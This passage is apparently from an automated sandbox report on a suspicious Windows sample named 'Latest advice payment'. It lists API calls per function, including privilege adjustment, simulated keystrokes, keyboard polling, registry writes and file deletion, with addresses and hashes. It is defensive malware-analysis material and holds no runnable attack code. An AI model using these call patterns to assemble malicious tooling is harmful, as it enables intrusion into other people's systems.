                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 005ED1E2
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 005ED20C
                                                            • SendMessageW.USER32 ref: 005ED22F
                                                            • ClientToScreen.USER32(?,?), ref: 005ED281
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 005ED2B5
                                                              • Part of subcall function 005625DB: GetWindowLongW.USER32(?,000000EB), ref: 005625EC
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 005ED351
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$F$pbb
                                                            • API String ID: 3977979337-2715286461
                                                            • Opcode ID: fa2466d3253302e34413b418961c61a112beb74964f13a31f889ecb95cbc99ca
                                                            • Instruction ID: fdecba9a0b2e41d25456a7a82c64b2f58ff82c480f48381387cf86241872ded1
                                                            • Opcode Fuzzy Hash: fa2466d3253302e34413b418961c61a112beb74964f13a31f889ecb95cbc99ca
                                                            • Instruction Fuzzy Hash: B542AE342046C1AFD728CF26D889AAABFE9FF49310F140919F5D6CB2A0CB71D946DB51
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memset
                                                            • String ID: ]a$3cW$DEFINE$P\a$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_W
                                                            • API String ID: 1357608183-3518050660
                                                            • Opcode ID: c214ffda42cf7aebba1123430a03d5fda375864b4ee81a2861ef3228a563e493
                                                            • Instruction ID: 965a40feb7011f66c376143fffe09d50b563d0368d2459669c07c76ae9c12238
                                                            • Opcode Fuzzy Hash: c214ffda42cf7aebba1123430a03d5fda375864b4ee81a2861ef3228a563e493
                                                            • Instruction Fuzzy Hash: B593B475E00219DFDB24CF58D8857EDBBB1FF48310F24856AE949AB281E770AE81DB50
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,?), ref: 005648DF
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0059D665
                                                            • IsIconic.USER32(?), ref: 0059D66E
                                                            • ShowWindow.USER32(?,00000009), ref: 0059D67B
                                                            • SetForegroundWindow.USER32(?), ref: 0059D685
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0059D69B
                                                            • GetCurrentThreadId.KERNEL32 ref: 0059D6A2
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0059D6AE
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0059D6BF
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0059D6C7
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 0059D6CF
                                                            • SetForegroundWindow.USER32(?), ref: 0059D6D2
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0059D6E7
                                                            • keybd_event.USER32(00000012,00000000), ref: 0059D6F2
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0059D6FC
                                                            • keybd_event.USER32(00000012,00000000), ref: 0059D701
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0059D70A
                                                            • keybd_event.USER32(00000012,00000000), ref: 0059D70F
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0059D719
                                                            • keybd_event.USER32(00000012,00000000), ref: 0059D71E
                                                            • SetForegroundWindow.USER32(?), ref: 0059D721
                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 0059D748
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: f6dbbcd42e3cf30ef8e126fb38a3b711bec80ea9dafe8eb693885b7c479c2d7f
                                                            • Instruction ID: e4fbf6a73cbc1914482df271289ab10db6a3ef845ed453cdccc3f46642c6e003
                                                            • Opcode Fuzzy Hash: f6dbbcd42e3cf30ef8e126fb38a3b711bec80ea9dafe8eb693885b7c479c2d7f
                                                            • Instruction Fuzzy Hash: 4E317071A40358BBEF246FA19C89F7F7E6CEB54B50F114026FA04EA1D1CAB15940ABA0
                                                            APIs
                                                              • Part of subcall function 005B87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005B882B
                                                              • Part of subcall function 005B87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005B8858
                                                              • Part of subcall function 005B87E1: GetLastError.KERNEL32 ref: 005B8865
                                                            • _memset.LIBCMT ref: 005B8353
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 005B83A5
                                                            • CloseHandle.KERNEL32(?), ref: 005B83B6
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005B83CD
                                                            • GetProcessWindowStation.USER32 ref: 005B83E6
                                                            • SetProcessWindowStation.USER32(00000000), ref: 005B83F0
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 005B840A
                                                              • Part of subcall function 005B81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005B8309), ref: 005B81E0
                                                              • Part of subcall function 005B81CB: CloseHandle.KERNEL32(?,?,005B8309), ref: 005B81F2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                            • String ID: $default$winsta0
                                                            • API String ID: 2063423040-1027155976
                                                            • Opcode ID: aaaa9a9f53312067f7715e3c07fb0c99788cf726e9207d62e620e9dccf2c68c1
                                                            • Instruction ID: 3f98d7a1fcd5d9cca431927ef572f39aa73d969373900d20b7539ab1791c1e2a
                                                            • Opcode Fuzzy Hash: aaaa9a9f53312067f7715e3c07fb0c99788cf726e9207d62e620e9dccf2c68c1
                                                            • Instruction Fuzzy Hash: D0813771900249BBDF219FA4CC49AFE7FBDBF04304F145169F950A62A1DB31AA14DB60
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 005CC78D
                                                            • FindClose.KERNEL32(00000000), ref: 005CC7E1
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 005CC806
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 005CC81D
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 005CC844
                                                            • __swprintf.LIBCMT ref: 005CC890
                                                            • __swprintf.LIBCMT ref: 005CC8D3
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                            • __swprintf.LIBCMT ref: 005CC927
                                                              • Part of subcall function 00583698: __woutput_l.LIBCMT ref: 005836F1
                                                            • __swprintf.LIBCMT ref: 005CC975
                                                              • Part of subcall function 00583698: __flsbuf.LIBCMT ref: 00583713
                                                              • Part of subcall function 00583698: __flsbuf.LIBCMT ref: 0058372B
                                                            • __swprintf.LIBCMT ref: 005CC9C4
                                                            • __swprintf.LIBCMT ref: 005CCA13
                                                            • __swprintf.LIBCMT ref: 005CCA62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 3953360268-2428617273
                                                            • Opcode ID: b06eb37703ce33349938516f3fd9855fa938acd943c26915bc17a44dbf37c6c9
                                                            • Instruction ID: 47a2a09a8a7f0d5bb6af897f9a3291b54a06fd98281a59b985b1f36cec7b3fc4
                                                            • Opcode Fuzzy Hash: b06eb37703ce33349938516f3fd9855fa938acd943c26915bc17a44dbf37c6c9
                                                            • Instruction Fuzzy Hash: BEA10BB1408246ABC754EFA4C989DAFBBECBFD8704F40091DF59587191EA35DA08CB62
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 005CEFB6
                                                            • _wcscmp.LIBCMT ref: 005CEFCB
                                                            • _wcscmp.LIBCMT ref: 005CEFE2
                                                            • GetFileAttributesW.KERNEL32(?), ref: 005CEFF4
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 005CF00E
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 005CF026
                                                            • FindClose.KERNEL32(00000000), ref: 005CF031
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 005CF04D
                                                            • _wcscmp.LIBCMT ref: 005CF074
                                                            • _wcscmp.LIBCMT ref: 005CF08B
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 005CF09D
                                                            • SetCurrentDirectoryW.KERNEL32(00618920), ref: 005CF0BB
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 005CF0C5
                                                            • FindClose.KERNEL32(00000000), ref: 005CF0D2
                                                            • FindClose.KERNEL32(00000000), ref: 005CF0E4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1803514871-438819550
                                                            • Opcode ID: 57326fc3a68504115172f42fb4cb20ce33553ed9e12982d0d5e09f6dc6f190ea
                                                            • Instruction ID: 826723a640709bbe3feec7226bb10cdfb6b4a7e6739d0370fa1026f09091e049
                                                            • Opcode Fuzzy Hash: 57326fc3a68504115172f42fb4cb20ce33553ed9e12982d0d5e09f6dc6f190ea
                                                            • Instruction Fuzzy Hash: 7531D2365002496ECB14ABA4DC8DFEE7BAEAF48720F1441B9E841E2091DF70DA84DB51
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005E0953
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,005EF910,00000000,?,00000000,?,?), ref: 005E09C1
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 005E0A09
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 005E0A92
                                                            • RegCloseKey.ADVAPI32(?), ref: 005E0DB2
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 005E0DBF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectCreateRegistryValue
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 536824911-966354055
                                                            • Opcode ID: ab9b03e903a0e9e3680966e8e4643689c3a75565cf6e01622bab920c416c0762
                                                            • Instruction ID: 34aabd6f6dedb26bed29122602a7f1af4a4d0da7cdf3de8f21101588f365675f
                                                            • Opcode Fuzzy Hash: ab9b03e903a0e9e3680966e8e4643689c3a75565cf6e01622bab920c416c0762
                                                            • Instruction Fuzzy Hash: 30026E756046529FCB14EF15C895E2ABBE5FF89320F04885CF8999B3A2DB70EC45CB81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0D`$0E`$0F`$3cW$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG`$_W
                                                            • API String ID: 0-815455075
                                                            • Opcode ID: f31915f37f17f1e5bb77c2e6f17d9fabaeed2183cecd6f0faee5a1e744f350ac
                                                            • Instruction ID: 2753d9b82f55221733ac00335448eadc68af97f7ca5f4ec0f3a6298d1768abfb
                                                            • Opcode Fuzzy Hash: f31915f37f17f1e5bb77c2e6f17d9fabaeed2183cecd6f0faee5a1e744f350ac
                                                            • Instruction Fuzzy Hash: BB728F75E00A19CBDB24CF59D8907EEBBB5FF44310F54856AE809EB280EB309D81DB94
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 005CF113
                                                            • _wcscmp.LIBCMT ref: 005CF128
                                                            • _wcscmp.LIBCMT ref: 005CF13F
                                                              • Part of subcall function 005C4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 005C43A0
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 005CF16E
                                                            • FindClose.KERNEL32(00000000), ref: 005CF179
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 005CF195
                                                            • _wcscmp.LIBCMT ref: 005CF1BC
                                                            • _wcscmp.LIBCMT ref: 005CF1D3
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 005CF1E5
                                                            • SetCurrentDirectoryW.KERNEL32(00618920), ref: 005CF203
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 005CF20D
                                                            • FindClose.KERNEL32(00000000), ref: 005CF21A
                                                            • FindClose.KERNEL32(00000000), ref: 005CF22C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 1824444939-438819550
                                                            • Opcode ID: 53e6c39d8b3aa7f5db75f9a123ee782aa4c4e7baf505154190cbc3c855a26ad8
                                                            • Instruction ID: f702a6816bb69d4f36be863784ea7bd1c71a11f63175d8e74b4f4d1ba32dcff3
                                                            • Opcode Fuzzy Hash: 53e6c39d8b3aa7f5db75f9a123ee782aa4c4e7baf505154190cbc3c855a26ad8
                                                            • Instruction Fuzzy Hash: A031D53A50025A6ECB14AFA4EC59FEE7BAEAF85360F140179E840A7090DB30DE45DB54
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 005CA20F
                                                            • __swprintf.LIBCMT ref: 005CA231
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 005CA26E
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 005CA293
                                                            • _memset.LIBCMT ref: 005CA2B2
                                                            • _wcsncpy.LIBCMT ref: 005CA2EE
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 005CA323
                                                            • CloseHandle.KERNEL32(00000000), ref: 005CA32E
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 005CA337
                                                            • CloseHandle.KERNEL32(00000000), ref: 005CA341
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2733774712-3457252023
                                                            • Opcode ID: 060728e2275daa43f96aea57608a9133e202af3d8455db6faa664141ae49d1e1
                                                            • Instruction ID: f846833ed2eca7392855dfe2df331aba77c348aa8172cc006601b135b8f283e3
                                                            • Opcode Fuzzy Hash: 060728e2275daa43f96aea57608a9133e202af3d8455db6faa664141ae49d1e1
                                                            • Instruction Fuzzy Hash: 5E31A27590415AABDB219FA0DC89FEB3BBCFF88705F1040B9F948D6150EB7096448B25
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 005C0097
                                                            • SetKeyboardState.USER32(?), ref: 005C0102
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 005C0122
                                                            • GetKeyState.USER32(000000A0), ref: 005C0139
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 005C0168
                                                            • GetKeyState.USER32(000000A1), ref: 005C0179
                                                            • GetAsyncKeyState.USER32(00000011), ref: 005C01A5
                                                            • GetKeyState.USER32(00000011), ref: 005C01B3
                                                            • GetAsyncKeyState.USER32(00000012), ref: 005C01DC
                                                            • GetKeyState.USER32(00000012), ref: 005C01EA
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 005C0213
                                                            • GetKeyState.USER32(0000005B), ref: 005C0221
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 327e6b4ced5e26718c30bdf3bd451b4514c7fb74cfd273c4cb4c04c838a358c6
                                                            • Instruction ID: 305b3dc3aa7bac51704db24498633bb65c2b0299f123dd26790a0b43ce00ca8d
                                                            • Opcode Fuzzy Hash: 327e6b4ced5e26718c30bdf3bd451b4514c7fb74cfd273c4cb4c04c838a358c6
                                                            • Instruction Fuzzy Hash: DF51FB209047C8ADFB35DBE08858FEAFFB4AF11780F48559E85C2561C3DAA49B8CC761
                                                            APIs
                                                              • Part of subcall function 005E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005DFDAD,?,?), ref: 005E0E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005E04AC
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 005E054B
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 005E05E3
                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 005E0822
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 005E082F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1240663315-0
                                                            • Opcode ID: ac4e3d02d07e57778d794b630a5e4bc5aa3deaaf65354343762374b5b1cb3807
                                                            • Instruction ID: 35cc10cd866bb3168027cabcba9e7d609f524e50d27bd7b9627d86fdd1d4de4d
                                                            • Opcode Fuzzy Hash: ac4e3d02d07e57778d794b630a5e4bc5aa3deaaf65354343762374b5b1cb3807
                                                            • Instruction Fuzzy Hash: 7AE15071204245AFCB14DF25C895E2ABBE8FF89314F04896DF48ADB2A1DA70ED45CB91
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: e79b337fad73a75f8756055d0b165a4c1ca49d61e7ad3ae2eb6ce60a00604d10
                                                            • Instruction ID: 52e994ca329fbf320ee332959539c773a6b0a4b32aa9510ba339e13ed8526115
                                                            • Opcode Fuzzy Hash: e79b337fad73a75f8756055d0b165a4c1ca49d61e7ad3ae2eb6ce60a00604d10
                                                            • Instruction Fuzzy Hash: DF21AD752012119FDB24AF64DC49B697FA8FF64310F00802AF986DB2A1CB30A901DB84
                                                            APIs
                                                              • Part of subcall function 00564750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00564743,?,?,005637AE,?), ref: 00564770
                                                              • Part of subcall function 005C4A31: GetFileAttributesW.KERNEL32(?,005C370B), ref: 005C4A32
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 005C38A3
                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 005C394B
                                                            • MoveFileW.KERNEL32(?,?), ref: 005C395E
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 005C397B
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 005C399D
                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 005C39B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
